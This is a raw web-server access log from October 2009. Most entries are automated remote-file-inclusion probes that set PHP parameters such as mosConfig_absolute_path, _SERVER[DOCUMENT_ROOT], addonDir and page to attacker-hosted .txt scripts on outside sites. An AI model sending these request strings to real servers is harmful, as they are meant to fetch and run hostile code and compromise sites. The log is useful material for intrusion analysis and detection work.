211.63.60.50 - - [12/Oct/2009:06:35:00 -0400] "GET /senetman/html/index.php?page=http://www.pinkelephantclub.com/eventphotos//oneadmin/photogallery/list/set1.txt? HTTP/1.1" 404 221 "-" "Mozilla/5.0"
211.63.60.50 - - [12/Oct/2009:06:35:00 -0400] "GET /logs/senetman/html/index.php?page=http://www.pinkelephantclub.com/eventphotos//oneadmin/photogallery/list/set1.txt? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
67.205.103.171 - - [12/Oct/2009:06:35:09 -0400] "GET /logs/access_log.Q109071600//?_SERVER%5BDOCUMENT_ROOT%5D=http://www.diakonia-jkt.sch.id/upload/id1?? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
211.63.60.50 - - [12/Oct/2009:06:35:10 -0400] "GET /logs/access_log.Q109071400%20%20/senetman/html/index.php?page=http://www.tinas.photocase.dk//sys/a.txt?? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
211.63.60.50 - - [12/Oct/2009:06:35:10 -0400] "GET /logs/senetman/html/index.php?page=http://www.tinas.photocase.dk//sys/a.txt?? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
211.63.60.50 - - [12/Oct/2009:06:35:10 -0400] "GET /senetman/html/index.php?page=http://www.tinas.photocase.dk//sys/a.txt?? HTTP/1.1" 404 221 "-" "Mozilla/5.0"
211.63.60.50 - - [12/Oct/2009:06:35:14 -0400] "GET /logs/senetman/html/index.php?page=http://www.tinas.photocase.dk//sys/a.txt?? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
211.63.60.50 - - [12/Oct/2009:06:35:14 -0400] "GET /logs/access_log.Q109071400%20%20/senetman/html/index.php?page=http://www.tinas.photocase.dk//sys/a.txt?? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
211.63.60.50 - - [12/Oct/2009:06:35:15 -0400] "GET /senetman/html/index.php?page=http://www.tinas.photocase.dk//sys/a.txt?? HTTP/1.1" 404 221 "-" "Mozilla/5.0"
212.92.23.89 - - [12/Oct/2009:06:35:16 -0400] "GET /logs/access_log.Q109052200//administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://maxi-rallye.be/joomla/zipimport/themza_j15_02/html/.../sistem.txt??? HTTP/1.1" 404 286 "-" "libwww-perl/5.813"
211.63.60.50 - - [12/Oct/2009:06:35:16 -0400] "GET /logs/access_log.Q109081600%20%20/senetman/html/index.php?page=http://www.pinkelephantclub.com/eventphotos//oneadmin/photogallery/list/set1.txt? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
211.63.60.50 - - [12/Oct/2009:06:35:22 -0400] "GET /logs/access_log.Q109081600%20%20/senetman/html/index.php?page=http://www.tinas.photocase.dk//sys/a.txt?? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
211.63.60.50 - - [12/Oct/2009:06:35:28 -0400] "GET /logs/access_log.Q109081600%20%20/senetman/html/index.php?page=http://www.tinas.photocase.dk//sys/a.txt?? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
67.205.103.171 - - [12/Oct/2009:06:35:34 -0400] "GET /logs/access_log.Q109080500//?_SERVER%5BDOCUMENT_ROOT%5D=http://www.diakonia-jkt.sch.id/upload/id1?? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
67.205.103.171 - - [12/Oct/2009:06:36:18 -0400] "GET /logs/access_log.Q109080500//?_SERVER%5BDOCUMENT_ROOT%5D=http://www.diakonia-jkt.sch.id/upload/id1?? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
193.4.113.98 - - [12/Oct/2009:06:37:13 -0400] "GET /logs/show_news.php?cutepath=http://arda.or.th/userfiles/id1.txt? HTTP/1.1" 404 216 "-" "Mozilla/5.0"
193.4.113.98 - - [12/Oct/2009:06:37:13 -0400] "GET /show_news.php?cutepath=http://arda.or.th/userfiles/id1.txt? HTTP/1.1" 404 211 "-" "Mozilla/5.0"
193.4.113.98 - - [12/Oct/2009:06:37:17 -0400] "GET /show_news.php?cutepath=http://arda.or.th/userfiles/id1.txt? HTTP/1.1" 404 211 "-" "Mozilla/5.0"
193.4.113.98 - - [12/Oct/2009:06:37:18 -0400] "GET /logs/show_news.php?cutepath=http://arda.or.th/userfiles/id1.txt? HTTP/1.1" 404 216 "-" "Mozilla/5.0"
193.4.113.98 - - [12/Oct/2009:06:38:02 -0400] "GET /logs/access_log.Q109081100/show_news.php?cutepath=http://arda.or.th/userfiles/id1.txt? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
193.4.113.98 - - [12/Oct/2009:06:38:02 -0400] "GET /logs/access_log.Q109081100/show_news.php?cutepath=http://arda.or.th/userfiles/id1.txt? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
209.59.12.99 - - [12/Oct/2009:06:38:02 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
199.238.165.123 - - [12/Oct/2009:06:38:19 -0400] "GET /logs////?_SERVER[DOCUMENT_ROOT]=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 200 21525 "-" "Mozilla/5.0"
199.238.165.123 - - [12/Oct/2009:06:38:22 -0400] "GET ////?_SERVER[DOCUMENT_ROOT]=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 200 454 "-" "Mozilla/5.0"
199.238.165.123 - - [12/Oct/2009:06:38:23 -0400] "GET /logs/access_log.Q109053100////?_SERVER[DOCUMENT_ROOT]=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
200.219.245.149 - - [12/Oct/2009:06:38:28 -0400] "GET /logs/access_log.Q109052500//?_zb_parh=http://kb27.co.kr/bbs///data/id1.txt?? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
200.219.245.149 - - [12/Oct/2009:06:38:42 -0400] "GET /logs/access_log.Q109052300//?_zb_parh=http://kb27.co.kr/bbs///data/id1.txt?? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
199.238.165.123 - - [12/Oct/2009:06:39:08 -0400] "GET /logs/access_log.Q109052800////?_SERVER[DOCUMENT_ROOT]=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
81.12.13.152 - - [12/Oct/2009:06:39:14 -0400] "GET ////?_SERVER[DOCUMENT_ROOT]=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 200 454 "-" "Mozilla/5.0"
81.12.13.152 - - [12/Oct/2009:06:39:14 -0400] "GET /logs/access_log.Q109053100////?_SERVER[DOCUMENT_ROOT]=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
81.12.13.152 - - [12/Oct/2009:06:39:14 -0400] "GET /logs////?_SERVER[DOCUMENT_ROOT]=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 200 21525 "-" "Mozilla/5.0"
81.12.13.152 - - [12/Oct/2009:06:39:26 -0400] "GET /logs/access_log.Q109052800////?_SERVER[DOCUMENT_ROOT]=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
211.63.60.50 - - [12/Oct/2009:06:39:27 -0400] "GET /logs/access_log.Q109071400/senetman/html/index.php?page=http://www.tinas.photocase.dk//sys/a.txt?? HTTP/1.1" 404 248 "-" "Mozilla/5.0"
211.63.60.50 - - [12/Oct/2009:06:39:31 -0400] "GET /logs/access_log.Q109091300/senetman/html/index.php?page=http://www.tinas.photocase.dk//sys/a.txt?? HTTP/1.1" 404 248 "-" "Mozilla/5.0"
211.63.60.50 - - [12/Oct/2009:06:39:38 -0400] "GET /logs/access_log.Q109071400/senetman/html/index.php?page=http://www.tinas.photocase.dk//sys/a.txt?? HTTP/1.1" 404 248 "-" "Mozilla/5.0"
211.63.60.50 - - [12/Oct/2009:06:39:39 -0400] "GET /logs/access_log.Q109091300/senetman/html/index.php?page=http://www.tinas.photocase.dk//sys/a.txt?? HTTP/1.1" 404 248 "-" "Mozilla/5.0"
211.63.60.50 - - [12/Oct/2009:06:40:30 -0400] "GET /logs/access_log.Q109071400/senetman/html/index.php?page=http://www.pinkelephantclub.com/eventphotos//oneadmin/photogallery/list/set1.txt? HTTP/1.1" 404 248 "-" "Mozilla/5.0"
211.63.60.50 - - [12/Oct/2009:06:40:35 -0400] "GET /logs/access_log.Q109091300/senetman/html/index.php?page=http://www.pinkelephantclub.com/eventphotos//oneadmin/photogallery/list/set1.txt? HTTP/1.1" 404 248 "-" "Mozilla/5.0"
174.142.120.148 - - [12/Oct/2009:06:41:11 -0400] "GET /logs/addons/guildbank/searcharrays.php?addonDir=http://www.telephone114.com/114gg/upfile/scgi-bin/admin/sql/old/database/infinity/infinity/infinity/infinity/infinity.icicibank.co.in/Update.banking/oldid1? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
174.142.120.148 - - [12/Oct/2009:06:41:11 -0400] "GET /addons/guildbank/searcharrays.php?addonDir=http://www.telephone114.com/114gg/upfile/scgi-bin/admin/sql/old/database/infinity/infinity/infinity/infinity/infinity.icicibank.co.in/Update.banking/oldid1? HTTP/1.1" 404 231 "-" "Mozilla/5.0"
174.142.120.148 - - [12/Oct/2009:06:41:11 -0400] "GET /logs/access_log.Q109071900%20%20/addons/guildbank/searcharrays.php?addonDir=http://www.telephone114.com/114gg/upfile/scgi-bin/admin/sql/old/database/infinity/infinity/infinity/infinity/infinity.icicibank.co.in/Update.banking/oldid1? HTTP/1.1" 404 260 "-" "Mozilla/5.0"
174.142.120.148 - - [12/Oct/2009:06:41:12 -0400] "GET /logs/access_log.Q109071900%20%20/addons/guildbank/searcharrays.php?addonDir=http://www.telephone114.com/114gg/upfile/scgi-bin/admin/sql/old/database/infinity/infinity/infinity/infinity/infinity.icicibank.co.in/Update.banking/oldid1? HTTP/1.1" 404 260 "-" "Mozilla/5.0"
174.142.120.148 - - [12/Oct/2009:06:41:12 -0400] "GET /logs/addons/guildbank/searcharrays.php?addonDir=http://www.telephone114.com/114gg/upfile/scgi-bin/admin/sql/old/database/infinity/infinity/infinity/infinity/infinity.icicibank.co.in/Update.banking/oldid1? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
174.142.120.148 - - [12/Oct/2009:06:41:12 -0400] "GET /addons/guildbank/searcharrays.php?addonDir=http://www.telephone114.com/114gg/upfile/scgi-bin/admin/sql/old/database/infinity/infinity/infinity/infinity/infinity.icicibank.co.in/Update.banking/oldid1? HTTP/1.1" 404 231 "-" "Mozilla/5.0"
85.128.60.100 - - [12/Oct/2009:06:41:23 -0400] "GET /logs/access_log.Q109090700//index.php?option=com_content&task=ionid=&id=&mosConfig_absolute_path=http://unixstats.org/tools/idxx.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
174.142.120.148 - - [12/Oct/2009:06:41:28 -0400] "GET /addons/guildbank/searcharrays.php?addonDir=http://www.telephone114.com/114gg/upfile/scgi-bin/admin/sql/old/database/infinity/infinity/infinity/infinity/infinity.icicibank.co.in/Update.banking/oldid1? HTTP/1.1" 404 231 "-" "Mozilla/5.0"
174.142.120.148 - - [12/Oct/2009:06:41:28 -0400] "GET /logs/addons/guildbank/searcharrays.php?addonDir=http://www.telephone114.com/114gg/upfile/scgi-bin/admin/sql/old/database/infinity/infinity/infinity/infinity/infinity.icicibank.co.in/Update.banking/oldid1? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
174.142.120.148 - - [12/Oct/2009:06:41:28 -0400] "GET /logs/access_log.Q109071900/addons/guildbank/searcharrays.php?addonDir=http://www.telephone114.com/114gg/upfile/scgi-bin/admin/sql/old/database/infinity/infinity/infinity/infinity/infinity.icicibank.co.in/Update.banking/oldid1? HTTP/1.1" 404 258 "-" "Mozilla/5.0"
174.142.120.148 - - [12/Oct/2009:06:41:32 -0400] "GET /logs/access_log.Q109071900/addons/guildbank/searcharrays.php?addonDir=http://www.telephone114.com/114gg/upfile/scgi-bin/admin/sql/old/database/infinity/infinity/infinity/infinity/infinity.icicibank.co.in/Update.banking/oldid1? HTTP/1.1" 404 258 "-" "Mozilla/5.0"
174.142.120.148 - - [12/Oct/2009:06:41:32 -0400] "GET /logs/addons/guildbank/searcharrays.php?addonDir=http://www.telephone114.com/114gg/upfile/scgi-bin/admin/sql/old/database/infinity/infinity/infinity/infinity/infinity.icicibank.co.in/Update.banking/oldid1? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
174.142.120.148 - - [12/Oct/2009:06:41:33 -0400] "GET /addons/guildbank/searcharrays.php?addonDir=http://www.telephone114.com/114gg/upfile/scgi-bin/admin/sql/old/database/infinity/infinity/infinity/infinity/infinity.icicibank.co.in/Update.banking/oldid1? HTTP/1.1" 404 231 "-" "Mozilla/5.0"
114.4.8.14 - - [12/Oct/2009:06:41:40 -0400] "GET /logs/addons/guildbank/searcharrays.php?addonDir=http://lighttown.net//copyright.txt? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
114.4.8.14 - - [12/Oct/2009:06:41:40 -0400] "GET /logs/access_log.Q109071900%20%20/addons/guildbank/searcharrays.php?addonDir=http://lighttown.net//copyright.txt? HTTP/1.1" 404 260 "-" "Mozilla/5.0"
61.100.5.136 - - [12/Oct/2009:06:41:58 -0400] "GET //ask_password.php?dir=http://www.telephone114.com/114gg/upfile/scgi-bin/admin/sql/old/database/infinity/infinity/infinity/infinity/infinity.icicibank.co.in/Update.banking/oldid1??? HTTP/1.1" 404 215 "-" "Mozilla/5.0"
61.100.5.136 - - [12/Oct/2009:06:41:58 -0400] "GET /logs//ask_password.php?dir=http://www.telephone114.com/114gg/upfile/scgi-bin/admin/sql/old/database/infinity/infinity/infinity/infinity/infinity.icicibank.co.in/Update.banking/oldid1??? HTTP/1.1" 404 220 "-" "Mozilla/5.0"
114.4.8.14 - - [12/Oct/2009:06:42:01 -0400] "GET /logs/error_log.Q109071900%20%20/addons/guildbank/searcharrays.php?addonDir=http://lighttown.net//copyright.txt? HTTP/1.1" 404 259 "-" "Mozilla/5.0"
61.100.5.136 - - [12/Oct/2009:06:42:01 -0400] "GET /logs/access_log.Q109063000//ask_password.php?dir=http://www.telephone114.com/114gg/upfile/scgi-bin/admin/sql/old/database/infinity/infinity/infinity/infinity/infinity.icicibank.co.in/Update.banking/oldid1??? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
61.100.5.136 - - [12/Oct/2009:06:42:05 -0400] "GET //ask_password.php?dir=http://www.telephone114.com/114gg/upfile/scgi-bin/admin/sql/old/database/infinity/infinity/infinity/infinity/infinity.icicibank.co.in/Update.banking/oldid1??? HTTP/1.1" 404 215 "-" "Mozilla/5.0"
61.100.5.136 - - [12/Oct/2009:06:42:05 -0400] "GET /logs/access_log.Q109063000//ask_password.php?dir=http://www.telephone114.com/114gg/upfile/scgi-bin/admin/sql/old/database/infinity/infinity/infinity/infinity/infinity.icicibank.co.in/Update.banking/oldid1??? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
61.100.5.136 - - [12/Oct/2009:06:42:05 -0400] "GET /logs//ask_password.php?dir=http://www.telephone114.com/114gg/upfile/scgi-bin/admin/sql/old/database/infinity/infinity/infinity/infinity/infinity.icicibank.co.in/Update.banking/oldid1??? HTTP/1.1" 404 220 "-" "Mozilla/5.0"
211.172.225.50 - - [12/Oct/2009:06:42:11 -0400] "GET /logs/access_log.Q109081900//?_zb_parh=http://rainmaker.co.th/images/idxx.txt??? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
174.142.120.148 - - [12/Oct/2009:06:42:57 -0400] "GET //ask_password.php?dir=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 215 "-" "Mozilla/5.0"
174.142.120.148 - - [12/Oct/2009:06:42:59 -0400] "GET //ask_password.php?dir=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 215 "-" "Mozilla/5.0"
174.142.120.148 - - [12/Oct/2009:06:42:59 -0400] "GET /logs/error_log.Q109063000//ask_password.php?dir=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 241 "-" "Mozilla/5.0"
174.142.120.148 - - [12/Oct/2009:06:42:59 -0400] "GET /logs//ask_password.php?dir=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 220 "-" "Mozilla/5.0"
174.142.120.148 - - [12/Oct/2009:06:43:01 -0400] "GET //ask_password.php?dir=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 215 "-" "Mozilla/5.0"
174.142.120.148 - - [12/Oct/2009:06:43:01 -0400] "GET //ask_password.php?dir=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 215 "-" "Mozilla/5.0"
174.142.120.148 - - [12/Oct/2009:06:43:01 -0400] "GET /logs//ask_password.php?dir=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 220 "-" "Mozilla/5.0"
174.142.120.148 - - [12/Oct/2009:06:43:01 -0400] "GET /logs/error_log.Q109063000//ask_password.php?dir=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 241 "-" "Mozilla/5.0"
174.142.120.148 - - [12/Oct/2009:06:43:01 -0400] "GET /logs//ask_password.php?dir=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 220 "-" "Mozilla/5.0"
174.142.120.148 - - [12/Oct/2009:06:43:01 -0400] "GET /logs/access_log.Q109063000//ask_password.php?dir=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
209.59.12.99 - - [12/Oct/2009:06:43:02 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
174.142.120.148 - - [12/Oct/2009:06:43:04 -0400] "GET /logs/access_log.Q109063000//ask_password.php?dir=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
174.142.120.148 - - [12/Oct/2009:06:43:04 -0400] "GET /logs//ask_password.php?dir=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 220 "-" "Mozilla/5.0"
174.142.120.148 - - [12/Oct/2009:06:43:14 -0400] "GET /logs/addons/guildbank/searcharrays.php?addonDir=http://www.telephone114.com/114gg/upfile/scgi-bin/admin/sql/old/database/infinity/infinity/infinity/infinity/infinity.icicibank.co.in/Update.banking/oldid1? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
174.142.120.148 - - [12/Oct/2009:06:43:14 -0400] "GET /addons/guildbank/searcharrays.php?addonDir=http://www.telephone114.com/114gg/upfile/scgi-bin/admin/sql/old/database/infinity/infinity/infinity/infinity/infinity.icicibank.co.in/Update.banking/oldid1? HTTP/1.1" 404 231 "-" "Mozilla/5.0"
174.142.120.148 - - [12/Oct/2009:06:43:14 -0400] "GET /logs/access_log.Q109071900/addons/guildbank/searcharrays.php?addonDir=http://www.telephone114.com/114gg/upfile/scgi-bin/admin/sql/old/database/infinity/infinity/infinity/infinity/infinity.icicibank.co.in/Update.banking/oldid1? HTTP/1.1" 404 258 "-" "Mozilla/5.0"
193.224.55.42 - - [12/Oct/2009:06:43:21 -0400] "GET /errors.php?error=http://kaffka-koll.pfk.u-kaposvar.hu/components/com_rwcards/safe.txt? HTTP/1.1" 404 208 "-" "libwww-perl/5.813"
174.142.120.148 - - [12/Oct/2009:06:43:30 -0400] "GET /logs/addons/guildbank/searcharrays.php?addonDir=http://www.telephone114.com/114gg/upfile/scgi-bin/admin/sql/old/database/infinity/infinity/infinity/infinity/infinity.icicibank.co.in/Update.banking/oldid1? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
174.142.120.148 - - [12/Oct/2009:06:43:30 -0400] "GET /addons/guildbank/searcharrays.php?addonDir=http://www.telephone114.com/114gg/upfile/scgi-bin/admin/sql/old/database/infinity/infinity/infinity/infinity/infinity.icicibank.co.in/Update.banking/oldid1? HTTP/1.1" 404 231 "-" "Mozilla/5.0"
174.142.120.148 - - [12/Oct/2009:06:43:30 -0400] "GET /logs/access_log.Q109071900/addons/guildbank/searcharrays.php?addonDir=http://www.telephone114.com/114gg/upfile/scgi-bin/admin/sql/old/database/infinity/infinity/infinity/infinity/infinity.icicibank.co.in/Update.banking/oldid1? HTTP/1.1" 404 258 "-" "Mozilla/5.0"
174.142.120.148 - - [12/Oct/2009:06:43:36 -0400] "GET /logs/error_log.Q109063000//ask_password.php?dir=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 241 "-" "Mozilla/5.0"
174.142.120.148 - - [12/Oct/2009:06:43:38 -0400] "GET /logs/error_log.Q109063000//ask_password.php?dir=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 241 "-" "Mozilla/5.0"
200.241.32.194 - - [12/Oct/2009:06:44:02 -0400] "GET /logs/access_log.Q109071900%20%20/addons/guildbank/searcharrays.php?addonDir=http://www.telephone114.com/114gg/upfile/scgi-bin/admin/sql/old/database/infinity/infinity/infinity/infinity/infinity.icicibank.co.in/Update.banking/oldid1? HTTP/1.1" 404 260 "-" "Mozilla/5.0"
200.241.32.194 - - [12/Oct/2009:06:44:02 -0400] "GET /logs/addons/guildbank/searcharrays.php?addonDir=http://www.telephone114.com/114gg/upfile/scgi-bin/admin/sql/old/database/infinity/infinity/infinity/infinity/infinity.icicibank.co.in/Update.banking/oldid1? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
200.241.32.194 - - [12/Oct/2009:06:44:05 -0400] "GET /addons/guildbank/searcharrays.php?addonDir=http://www.telephone114.com/114gg/upfile/scgi-bin/admin/sql/old/database/infinity/infinity/infinity/infinity/infinity.icicibank.co.in/Update.banking/oldid1? HTTP/1.1" 404 231 "-" "Mozilla/5.0"
211.47.71.89 - - [12/Oct/2009:06:44:08 -0400] "GET //ask_password.php?dir=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 215 "-" "Mozilla/5.0"
211.47.71.89 - - [12/Oct/2009:06:44:08 -0400] "GET /logs/access_log.Q109063000//ask_password.php?dir=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
211.47.71.89 - - [12/Oct/2009:06:44:08 -0400] "GET /logs//ask_password.php?dir=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 220 "-" "Mozilla/5.0"
200.241.32.194 - - [12/Oct/2009:06:44:10 -0400] "GET /logs/addons/guildbank/searcharrays.php?addonDir=http://www.telephone114.com/114gg/upfile/scgi-bin/admin/sql/old/database/infinity/infinity/infinity/infinity/infinity.icicibank.co.in/Update.banking/oldid1? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
200.241.32.194 - - [12/Oct/2009:06:44:10 -0400] "GET /addons/guildbank/searcharrays.php?addonDir=http://www.telephone114.com/114gg/upfile/scgi-bin/admin/sql/old/database/infinity/infinity/infinity/infinity/infinity.icicibank.co.in/Update.banking/oldid1? HTTP/1.1" 404 231 "-" "Mozilla/5.0"
200.241.32.194 - - [12/Oct/2009:06:44:10 -0400] "GET /logs/access_log.Q109071900%20%20/addons/guildbank/searcharrays.php?addonDir=http://www.telephone114.com/114gg/upfile/scgi-bin/admin/sql/old/database/infinity/infinity/infinity/infinity/infinity.icicibank.co.in/Update.banking/oldid1? HTTP/1.1" 404 260 "-" "Mozilla/5.0"
61.100.5.136 - - [12/Oct/2009:06:44:33 -0400] "GET //ask_password.php?dir=http://www.telephone114.com/114gg/upfile/scgi-bin/admin/sql/old/database/infinity/infinity/infinity/infinity/infinity.icicibank.co.in/Update.banking/oldid1??? HTTP/1.1" 404 215 "-" "Mozilla/5.0"
61.100.5.136 - - [12/Oct/2009:06:44:33 -0400] "GET /logs/access_log.Q109063000//ask_password.php?dir=http://www.telephone114.com/114gg/upfile/scgi-bin/admin/sql/old/database/infinity/infinity/infinity/infinity/infinity.icicibank.co.in/Update.banking/oldid1??? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
61.100.5.136 - - [12/Oct/2009:06:44:33 -0400] "GET /logs//ask_password.php?dir=http://www.telephone114.com/114gg/upfile/scgi-bin/admin/sql/old/database/infinity/infinity/infinity/infinity/infinity.icicibank.co.in/Update.banking/oldid1??? HTTP/1.1" 404 220 "-" "Mozilla/5.0"
211.47.71.89 - - [12/Oct/2009:06:44:34 -0400] "GET /logs/error_log.Q109063000//ask_password.php?dir=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 241 "-" "Mozilla/5.0"
64.221.88.162 - - [12/Oct/2009:06:44:49 -0400] "GET /images/psearch_go.gif HTTP/1.1" 304 - "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; FunWebProducts; GTB6)"
64.221.88.162 - - [12/Oct/2009:06:44:49 -0400] "GET /images/login_go.gif HTTP/1.1" 304 - "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; FunWebProducts; GTB6)"
199.238.165.123 - - [12/Oct/2009:06:44:50 -0400] "GET /logs/access_log.Q109053100%20%20////?_SERVER[DOCUMENT_ROOT]=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 230 "-" "Mozilla/5.0"
64.221.88.162 - - [12/Oct/2009:06:44:52 -0400] "GET /images/login_go-over.gif HTTP/1.1" 304 - "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; FunWebProducts; GTB6)"
64.221.88.162 - - [12/Oct/2009:06:44:52 -0400] "GET /images/psearch_go-over.gif HTTP/1.1" 304 - "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; FunWebProducts; GTB6)"
114.4.8.14 - - [12/Oct/2009:06:45:04 -0400] "GET /logs/addons/guildbank/searcharrays.php?addonDir=http://lighttown.net//copyright.txt? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
114.4.8.14 - - [12/Oct/2009:06:45:04 -0400] "GET /logs/access_log.Q109071900/addons/guildbank/searcharrays.php?addonDir=http://lighttown.net//copyright.txt? HTTP/1.1" 404 258 "-" "Mozilla/5.0"
174.142.120.148 - - [12/Oct/2009:06:45:05 -0400] "GET //ask_password.php?dir=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 215 "-" "Mozilla/5.0"
174.142.120.148 - - [12/Oct/2009:06:45:05 -0400] "GET /logs/access_log.Q109063000%20%20//ask_password.php?dir=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 244 "-" "Mozilla/5.0"
174.142.120.148 - - [12/Oct/2009:06:45:05 -0400] "GET /logs//ask_password.php?dir=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 220 "-" "Mozilla/5.0"
61.100.5.136 - - [12/Oct/2009:06:45:08 -0400] "GET //ask_password.php?dir=http://www.telephone114.com/114gg/upfile/scgi-bin/admin/sql/old/database/infinity/infinity/infinity/infinity/infinity.icicibank.co.in/Update.banking/oldid1??? HTTP/1.1" 404 215 "-" "Mozilla/5.0"
174.142.120.148 - - [12/Oct/2009:06:45:09 -0400] "GET //ask_password.php?dir=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 215 "-" "Mozilla/5.0"
174.142.120.148 - - [12/Oct/2009:06:45:09 -0400] "GET /logs/access_log.Q109063000%20%20//ask_password.php?dir=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 244 "-" "Mozilla/5.0"
174.142.120.148 - - [12/Oct/2009:06:45:09 -0400] "GET /logs//ask_password.php?dir=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 220 "-" "Mozilla/5.0"
199.238.165.123 - - [12/Oct/2009:06:45:10 -0400] "GET /logs/access_log.Q109052800%20%20////?_SERVER[DOCUMENT_ROOT]=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 230 "-" "Mozilla/5.0"
211.47.71.89 - - [12/Oct/2009:06:45:12 -0400] "GET /addons/guildbank/searcharrays.php?addonDir=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 231 "-" "Mozilla/5.0"
114.4.8.14 - - [12/Oct/2009:06:45:12 -0400] "GET /logs/error_log.Q109071900/addons/guildbank/searcharrays.php?addonDir=http://lighttown.net//copyright.txt? HTTP/1.1" 404 257 "-" "Mozilla/5.0"
61.100.5.136 - - [12/Oct/2009:06:45:12 -0400] "GET /logs//ask_password.php?dir=http://www.telephone114.com/114gg/upfile/scgi-bin/admin/sql/old/database/infinity/infinity/infinity/infinity/infinity.icicibank.co.in/Update.banking/oldid1??? HTTP/1.1" 404 220 "-" "Mozilla/5.0"
61.100.5.136 - - [12/Oct/2009:06:45:12 -0400] "GET /logs/access_log.Q109063000//ask_password.php?dir=http://www.telephone114.com/114gg/upfile/scgi-bin/admin/sql/old/database/infinity/infinity/infinity/infinity/infinity.icicibank.co.in/Update.banking/oldid1??? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
211.47.71.89 - - [12/Oct/2009:06:45:16 -0400] "GET /logs/addons/guildbank/searcharrays.php?addonDir=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
211.47.71.89 - - [12/Oct/2009:06:45:16 -0400] "GET /logs/access_log.Q109071900/addons/guildbank/searcharrays.php?addonDir=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 258 "-" "Mozilla/5.0"
211.47.71.89 - - [12/Oct/2009:06:45:32 -0400] "GET /logs/error_log.Q109071900/addons/guildbank/searcharrays.php?addonDir=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 257 "-" "Mozilla/5.0"
